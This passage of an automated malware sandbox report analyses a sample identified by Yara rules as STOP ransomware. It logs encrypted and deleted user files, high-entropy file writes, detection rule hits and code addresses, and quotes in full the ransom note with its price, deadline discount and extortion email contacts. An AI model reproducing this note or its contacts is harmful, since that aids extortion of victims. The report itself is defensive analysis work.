              Source: Yara matchFile source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7708, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7868, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPED
              Modifies existing user documents (likely ransomware behavior)
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile moved: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile deleted: C:\Users\user\Desktop\WKXEWIOTXI.pngJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile moved: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile deleted: C:\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docxJump to behavior
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile moved: C:\Users\user\Desktop\NWTVCDUMOB.pdfJump to behavior
              Writes a notice file (html or txt) to demand a ransom
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile dropped: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt -> decryption settings;change encryption settings"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevices.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevices"},"system.comment":{"type":12,"value":"bluetooth and other devices settings"},"system.highkeywords":{"type":12,"value":"device;projector;projectors;pair bluetooth device;unpair device;pair device;bluetooth settings;add bluetooth device;add device"}},{"system.parsingname":{"type":12,"value":"aaa_settingspagedevicespen-2.settingcontent-ms"},"system.setting.fontfamily":{"type":12,"value":"segoe mdl2 assets"},"system.setting.glyph":{"type":12,"value":""},"system.setting.pageid":{"type":12,"value":"settingspagedevicespen"},"system.comment":{"type":12,"value":"pen and windows ink settings"},"system.highkeywords":{"type":12,"value":"pens;handedness;cursor;cursors;writing;write;workspace;pen shortcuts;hJump to dropped file
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-eyusqpkbflprice of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshmail.topreserve e-mail address to contact us:datarestorehelp@airmail.ccyour personal id:0816josiephjtdho970vyx7vwlyg00oakdr75rujz7nxdart1Jump to dropped file
              Writes many files with high entropy
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log entropy: 7.99312633191Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440002v9.xml entropy: 7.99617796879Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule440007v3.xml entropy: 7.99533573246Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99172098852Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99734304608Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99658111469Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma entropy: 7.99074000166Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat entropy: 7.99049189549Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt entropy: 7.99829521335Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt entropy: 7.99834687895Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt entropy: 7.99844103916Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt entropy: 7.99838096058Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt entropy: 7.99829234846Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt entropy: 7.99831792079Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json entropy: 7.99865889579Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133498356744920266.txt entropy: 7.99852303917Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945549071925.txt entropy: 7.99786735486Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt entropy: 7.99839446175Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl entropy: 7.99732723421Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite entropy: 7.99853111382Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log entropy: 7.99755528807Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db entropy: 7.99393233319Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1 entropy: 7.99862984651Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2 entropy: 7.99412319146Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script_300161259571223429446516194326035503227.rel.v2 entropy: 7.99764579868Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4 entropy: 7.9981973835Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\setup32.exe_Rules.xml entropy: 7.99869047943Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct443C.tmp.ppvw (copy) entropy: 7.99699310807Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct49A7.tmp.ppvw (copy) entropy: 7.99710290026Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctAB5F.tmp.ppvw (copy) entropy: 7.9976240835Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctDB2E.tmp.ppvw (copy) entropy: 7.99692804308Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctE4A4.tmp.ppvw (copy) entropy: 7.99765308787Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctEA40.tmp.ppvw (copy) entropy: 7.99737774376Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF411.tmp.ppvw (copy) entropy: 7.99734330282Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.ppvw (copy) entropy: 7.99172098852Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.ppvw (copy) entropy: 7.99734304608Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.ppvw (copy) entropy: 7.99658111469Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Edge\User Data\CrashpadMetrics-active.pma.ppvw (copy) entropy: 7.99074000166Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\input\en-GB\userdict_v1.0809.dat.ppvw (copy) entropy: 7.99049189549Jump to dropped file
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\16.0\setup32.exe_Rules.xml.ppvw (copy) entropy: 7.99869047943Jump to dropped file

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000000.1827821890.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000000.1745267014.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000002.2913878626.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000002.1757288854.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000003.1658712318.0000000003271000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000000.1827888819.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1646052396.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000006.00000002.1839495564.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000004.00000000.1745023046.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7476, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7568, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7620, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: DROPPEDMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046D2400_2_0046D240
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_00479F900_2_00479F90
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004650570_2_00465057
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0046C0700_2_0046C070
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048E0030_2_0048E003
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_0048F0100_2_0048F010
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004680300_2_00468030
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004670E00_2_004670E0
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_004701600_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 0_2_005281130_2_00528113
